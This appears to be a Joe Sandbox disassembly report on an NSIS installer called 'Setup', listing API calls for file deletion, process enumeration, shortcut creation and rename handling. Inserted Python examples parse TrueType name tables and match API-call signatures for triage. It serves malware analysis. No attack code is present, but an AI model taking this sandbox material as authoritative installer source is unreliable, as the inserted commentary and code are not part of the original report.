                                                                    • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                  • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                    • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,759223A0,00000000), ref: 00406902
                                                                  • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                  • String ID: F$A
                                                                  • API String ID: 3347642858-1281894373
                                                                  • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                  • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                  • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                  • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                  • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                  • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                  • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                  • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                  • CloseHandle.KERNEL32(?), ref: 00407212
                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                  • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                  • API String ID: 1916479912-1189179171
                                                                  • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                  • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                  • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                  • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
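The call sequence in the entry above (CreateFileW, one ReadFile of 12 bytes, a loop of ReadFile calls of 16 bytes, lstrcpynA into a 5-byte buffer, lstrcmpA against "name") is the TrueType table-directory walk: a 12-byte offset table followed by 16-byte table records whose first four bytes are the tag. The Python below is an added example, not code from the report or from the installer: it reproduces that walk on a constructed two-table font and then goes one step further than the trace shows by reading a string out of the located name table. The name-table layout used is the standard TrueType one; the sample font bytes and the function names are constructed for this example.

```python
"""TrueType table-directory walk mirroring the traced GetTTFNameString calls.
Added example; not the report's or the installer's own code."""
import struct
from typing import Optional, Tuple

# Big-endian structures from the TrueType/OpenType specification.
OFFSET_TABLE = struct.Struct(">IHHHH")  # sfntVersion, numTables, searchRange, entrySelector, rangeShift (12 bytes)
TABLE_RECORD = struct.Struct(">4sIII")  # tag, checksum, offset, length (16 bytes)
NAME_HEADER = struct.Struct(">HHH")     # format, count, stringOffset
NAME_RECORD = struct.Struct(">HHHHHH")  # platformID, encodingID, languageID, nameID, length, offset


def find_table(data: bytes, wanted: bytes) -> Optional[Tuple[int, int]]:
    """Return (offset, length) of the table tagged `wanted`, or None.

    Same shape as the trace: one 12-byte read for the offset table, then one
    16-byte read per record, comparing the 4-byte tag (the lstrcpynA into a
    5-byte buffer followed by lstrcmpA) until it matches.
    """
    if len(data) < OFFSET_TABLE.size:
        return None
    _, num_tables, _, _, _ = OFFSET_TABLE.unpack_from(data, 0)
    pos = OFFSET_TABLE.size
    for _ in range(num_tables):
        if pos + TABLE_RECORD.size > len(data):
            return None  # directory truncated: stop instead of reading past EOF
        tag, _, offset, length = TABLE_RECORD.unpack_from(data, pos)
        if tag == wanted:
            if offset + length > len(data):
                return None  # record points outside the file
            return offset, length
        pos += TABLE_RECORD.size
    return None


def get_ttf_name_string(data: bytes, name_id: int = 4) -> Optional[str]:
    """Pull one string record (default nameID 4, the full font name) from the name table.

    This step is beyond what the API trace shows; the layout is the standard
    TrueType name table.  Windows-platform (3) strings are UTF-16BE.
    """
    located = find_table(data, b"name")
    if located is None:
        return None
    base, length = located
    table = data[base:base + length]
    if len(table) < NAME_HEADER.size:
        return None
    _, count, string_offset = NAME_HEADER.unpack_from(table, 0)
    for i in range(count):
        rec_pos = NAME_HEADER.size + i * NAME_RECORD.size
        if rec_pos + NAME_RECORD.size > len(table):
            return None
        platform_id, _, _, nid, slen, soff = NAME_RECORD.unpack_from(table, rec_pos)
        if nid != name_id:
            continue
        raw = table[string_offset + soff:string_offset + soff + slen]
        if len(raw) != slen:
            return None  # string data lies outside the table
        return raw.decode("utf-16-be" if platform_id == 3 else "latin-1")
    return None


def build_sample_ttf() -> bytes:
    """Constructed two-table font: a 'head' filler table plus a 'name' table holding
    one Windows-platform record, nameID 4 = 'Example Sans'.  Sample input only."""
    full_name = "Example Sans".encode("utf-16-be")
    name_table = (NAME_HEADER.pack(0, 1, NAME_HEADER.size + NAME_RECORD.size)
                  + NAME_RECORD.pack(3, 1, 0x0409, 4, len(full_name), 0)
                  + full_name)
    head_table = b"\x00" * 54
    num_tables = 2
    head_off = OFFSET_TABLE.size + num_tables * TABLE_RECORD.size
    name_off = head_off + len(head_table)
    return (OFFSET_TABLE.pack(0x00010000, num_tables, 32, 1, 0)
            + TABLE_RECORD.pack(b"head", 0, head_off, len(head_table))
            + TABLE_RECORD.pack(b"name", 0, name_off, len(name_table))
            + head_table + name_table)


if __name__ == "__main__":
    font = build_sample_ttf()
    print(find_table(font, b"name"))  # (98, 42)
    print(get_ttf_name_string(font))  # Example Sans
```

The bounds checks are the part worth keeping when writing such a reader for untrusted fonts: a table record may point past the end of the file, and a name record may point past the end of its table, so both are checked before slicing.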
                                                                  APIs
                                                                  • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,759223A0,00000000), ref: 00406902
                                                                  • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                    • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                  • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                  • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                  • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,759223A0,00000000), ref: 00406A73
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                  • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                  • API String ID: 3581403547-1792361021
                                                                  • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                  • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                  • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                  • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                  Strings
                                                                  • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: CreateInstance
                                                                  • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                  • API String ID: 542301482-1377821865
                                                                  • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                  • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                  • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                  • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                  • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                  • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                  • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                  • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                  • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                  • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
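The per-function "APIs" bullets are the raw material for behavioural triage of this sample: the Delete/RMDir entry above records a wildcard directory walk (lstrcatW with \*.*, FindFirstFileW and FindNextFileW, DeleteFileW), and the entry that follows records process enumeration through late-bound PSAPI exports (LoadLibraryA of PSAPI.DLL, then GetProcAddress for EnumProcesses, EnumProcessModules and GetModuleBaseNameW). The Python below is an added example, not Joe Sandbox's or the sample's code: it parses the "• Api.MODULE(args), ref: addr" lines of an entry, sets aside "Part of subcall function" lines so that callee activity is not credited to the function itself, and matches two hand-written API-set signatures. The signature names are invented for the example; the input text is copied from those two entries and is labelled as constructed input.

```python
"""Parse the per-function 'APIs' bullets of a Joe Sandbox IDA-plugin entry and
match API-set signatures against them.  Added example; not Joe Sandbox's or
the sample's code.  Signature names are invented for the example."""
import re
from typing import Dict, List, NamedTuple, Optional, Tuple


class ApiCall(NamedTuple):
    api: str
    module: str
    args: str      # raw argument text between the parentheses
    ref: str       # call-site address from "ref:"
    subcall: bool  # True for "Part of subcall function ..." lines (a callee, not this function)


API_LINE = re.compile(
    r"•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)


def parse_api_lines(text: str) -> List[ApiCall]:
    """Keep only API-call bullets; 'APIs'/'Strings' headers and string xrefs do not match."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if m:
            calls.append(ApiCall(m.group("api"), m.group("module"), m.group("args"),
                                 m.group("ref"), m.group("sub") is not None))
    return calls


# Each requirement is (api name, substring that must appear in its arguments, or None).
# Order is deliberately not required: the report lists calls by address, not by
# execution order (DeleteFileW sits before FindFirstFileW in the Delete/RMDir entry).
SIGNATURES: Dict[str, List[Tuple[str, Optional[str]]]] = {
    "psapi_process_enum": [("LoadLibraryA", "PSAPI.DLL"),
                           ("GetProcAddress", "EnumProcesses"),
                           ("GetProcAddress", "GetModuleBaseNameW")],
    "wildcard_delete_walk": [("lstrcatW", r"\*.*"),
                             ("FindFirstFileW", None),
                             ("FindNextFileW", None),
                             ("DeleteFileW", None)],
}


def match_signature(calls: List[ApiCall],
                    requirements: List[Tuple[str, Optional[str]]]) -> Optional[Dict[str, str]]:
    """Return {'Api(needle)': ref} when every requirement is met by a direct call, else None."""
    hits = {}
    for api, needle in requirements:
        for call in calls:
            if not call.subcall and call.api == api and (needle is None or needle in call.args):
                hits[f"{api}({needle or ''})"] = call.ref
                break
        else:
            return None
    return hits


def scan_entry(text: str) -> Dict[str, Dict[str, str]]:
    """Run every signature over one entry; the result maps signature name to its call sites."""
    calls = parse_api_lines(text)
    results = {}
    for name, requirements in SIGNATURES.items():
        hit = match_signature(calls, requirements)
        if hit is not None:
            results[name] = hit
    return results


# Constructed input: API bullets copied from two entries of this report.
PSAPI_ENTRY = """APIs
• GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
• lstrlenW.KERNEL32(?), ref: 004063F8
• GetVersionExW.KERNEL32(?), ref: 00406456
  • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
• LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
• FreeLibrary.KERNEL32(00000000), ref: 00406500
• GlobalFree.KERNEL32(?), ref: 00406509
"""

DELETE_ENTRY = r"""APIs
• DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
• lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
• lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
• lstrlenW.KERNEL32(?), ref: 00406D58
• FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
• FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
• FindClose.KERNEL32(?), ref: 00406E5F
Strings
• RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
"""

if __name__ == "__main__":
    for label, entry in (("psapi", PSAPI_ENTRY), ("delete", DELETE_ENTRY)):
        print(label, scan_entry(entry))
```

Excluding subcall lines matters for attribution: the CharUpperW call in the PSAPI entry belongs to function 00406057, and crediting it to the enumerating function would produce false matches as soon as a signature mentions it. The returned refs are the call-site addresses, which is what an analyst needs to jump to in the dump.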
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                  • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                  • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                    • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                  • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                  • GlobalFree.KERNEL32(?), ref: 00406509
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                  • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                  • API String ID: 20674999-2124804629
                                                                  • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                  • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                  • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                  • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                  APIs
                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                  • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                  • GetSysColor.USER32(?), ref: 004041DB
                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                  • lstrlenW.KERNEL32(?), ref: 00404202
                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                    • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                    • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                    • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                  • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                  • SendMessageW.USER32(00000000), ref: 0040427D
                                                                  • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                  • SetCursor.USER32(00000000), ref: 004042FE
                                                                  • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                  • SetCursor.USER32(00000000), ref: 00404322
                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                  • String ID: F$N$open
                                                                  • API String ID: 3928313111-1104729357
                                                                  • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                  • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                  • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                  • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                  APIs
                                                                  • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                  • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                  • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                    • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                    • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                  • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                  • wsprintfA.USER32 ref: 00406B79
                                                                  • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                    • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                    • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                  • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                  • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                  • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                  • API String ID: 565278875-3368763019
